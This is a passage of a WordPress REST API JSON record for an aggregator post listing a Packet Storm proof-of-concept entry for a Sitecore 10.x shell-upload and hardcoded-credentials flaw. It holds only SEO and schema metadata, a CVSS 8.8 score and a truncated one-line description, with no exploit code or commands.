===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215879″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215879\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-19T16:30:53″,”description”:”Proof of concept exploit for a remote code execution vulnerability chain affecting Sitecore Experience Platform versions 10.x combining hardcoded credentials with file upload vulnerabilities for…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-41638","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Sitecore Experience Manager \/ Experience Platform 10.1 Shell Upload \/ Hardcoded Credentials_PACKETSTORM:215879 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41638\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Sitecore Experience Manager \/ Experience Platform 10.1 Shell Upload \/ Hardcoded Credentials_PACKETSTORM:215879 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-19T16:30:53″,”description”:”Proof of concept exploit for a remote code execution vulnerability chain affecting Sitecore Experience Platform versions 10.x combining hardcoded credentials with file upload vulnerabilities for...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41638\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-19T10:38:13+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"18 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41638#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41638\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Sitecore Experience Manager \\\/ Experience Platform 10.1 Shell Upload \\\/ Hardcoded Credentials_PACKETSTORM:215879\",\"datePublished\":\"2026-02-19T10:38:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41638\"},\"wordCount\":3523,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41638#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41638\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41638\",\"name\":\"\ud83d\udcc4 Sitecore Experience Manager \\\/ Experience Platform 10.1 Shell Upload \\\/ Hardcoded Credentials_PACKETSTORM:215879 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-19T10:38:13+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41638#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41638\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41638#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Sitecore Experience Manager \\\/ Experience Platform 10.1 Shell Upload \\\/ Hardcoded Credentials_PACKETSTORM:215879\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Sitecore Experience Manager \/ Experience Platform 10.1 Shell Upload \/ Hardcoded Credentials_PACKETSTORM:215879 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41638","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Sitecore Experience Manager \/ Experience Platform 10.1 Shell Upload \/ Hardcoded Credentials_PACKETSTORM:215879 - zero redgem","og_description":"{“lastseen”:”2026-02-19T16:30:53″,”description”:”Proof of concept exploit for a remote code execution vulnerability chain affecting Sitecore Experience Platform versions 10.x combining hardcoded credentials with file upload vulnerabilities for...","og_url":"https:\/\/zero.redgem.net\/?p=41638","og_site_name":"zero redgem","article_published_time":"2026-02-19T10:38:13+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"18 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41638#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41638"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Sitecore Experience Manager \/ Experience Platform 10.1 Shell Upload \/ Hardcoded Credentials_PACKETSTORM:215879","datePublished":"2026-02-19T10:38:13+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41638"},"wordCount":3523,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41638#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41638","url":"https:\/\/zero.redgem.net\/?p=41638","name":"\ud83d\udcc4 Sitecore Experience Manager \/ Experience Platform 10.1 Shell Upload \/ Hardcoded Credentials_PACKETSTORM:215879 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-19T10:38:13+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41638#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41638"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41638#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Sitecore Experience Manager \/ Experience Platform 10.1 Shell Upload \/ Hardcoded Credentials_PACKETSTORM:215879"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41638","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41638"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41638\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41638"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41638"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41638"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}